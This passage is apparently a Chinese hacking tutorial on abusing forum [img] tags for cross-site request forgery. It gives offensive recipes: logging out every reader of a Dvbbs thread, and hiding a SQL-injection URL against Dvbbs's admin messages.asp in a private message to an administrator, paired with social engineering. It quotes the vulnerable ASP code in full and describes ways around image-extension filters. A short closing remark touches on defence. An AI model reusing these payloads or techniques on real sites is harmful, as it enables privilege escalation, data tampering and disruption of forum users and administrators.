大家可以测试看看，我们的访问被记录了，甚至还得到了提交的参数，但是这对于浏览器来说是未知的，因为我们只看到了一个红X。到这里我们也许知道我们可以用这个东西做什么了！就是可以以浏览者的身份悄悄去访问一个页面，甚至支持Get的参数请求，这很重要，理解了这个就可以在后面发挥我们的想象力来利用这个来做什么！

　　1、刷流量:我们可以在一个流量大的论坛把自己的图象设置成要刷的页面，然后每一个浏览者都会去访问下我们的页面，不管他是否看到了，但是他访问了，不是么？

　　2、破坏:这个让人很恼火，对于动网论坛如果把你的图象设置成logout.asp的话，呵呵，所有看了你的帖子的人都会被T了，很爽吧！

　　呵呵，至于幻影论坛，大家可以试试，但是这是很不道德的！

　　3、黑客:这个是我们最感兴趣的，可以跨越权限做一些事情，因为现在很多的程序对于前台都是防守较好，但是后台就不是那么严密了。如果程序中取得数据的时候是用request("id")这样的方法取得的话，那么我们就可以利用标签向Cgi脚本提交数据了，注意必须不能是request.form("username2")这种严格指定了取得的变量来源的方式，因为我们的变量只能通过URL提交也就是上面说的QUERY_STRING方式。这对于写法不严密的程序是很致命的，要例子的话动网就是一个，动网Sql版本后台的messages.asp里取得数据的方式就是request，代码如下：

......
Sub Del()
Dim Dnum
If Request("username") = "" Then
Body = Body + "<br>" + "请输入要批量删除的用户名。"
Exit Sub
End If
Sql = "select COUNT(*) FROM Dv_Message where Sender = '" & Request("username") & "'"
Set Rs = Dvbbs.Execute(Sql)
......

这本来是后台的必须要有后台管理权限才能访问的，但是我们构造这样一个Url：

http://bbs.dvbbs.net/admin/messages.asp?action=del&user=&#39;;update/**/Dv_User/**/set/**/UserEmail=(select/**/top/**/1/**/

[Username]/**/from/**/Dv_admin)/**/where[UserName]='loveshell';--

　　或者类似的语句了，然后放到[Img]标签里。大家也许觉得管理员看自己帖子的可能性也不大，但是要知道论坛短信也是支持和发帖子一样的[img]标签的，所以如果能给管理员发个短信，在里面构造我们的Img标签只要他一打开短信就会种招的哦！如果可以和社会工程学联一块，杀人不沾血啊，呵呵！有点遗憾的是仿佛动网对&等符号做了转换，大家可以尝试突破，更何况网络上写法不严密的程序何止千万。

　　4 想象力 大家赚钱都这么辛苦，如果把IMG标签里的地址改成附件下载地址的话，呵呵，说说而已，没有测试。

　　5 ......

　　再说说对这个问题如何防御，如果想保留这个[IMG]标签但是又不想出问题的话，是需要转换的，譬如限定后缀必须是jpg，呵呵这可以通过URL编码加#JPG饶过，反正我觉得如果有限制的话一般都是能饶过的，即使你限制了IMG，那好，还有Flash标签呢，还有Rm标签呢？......

　　防御和利用都是艰难的。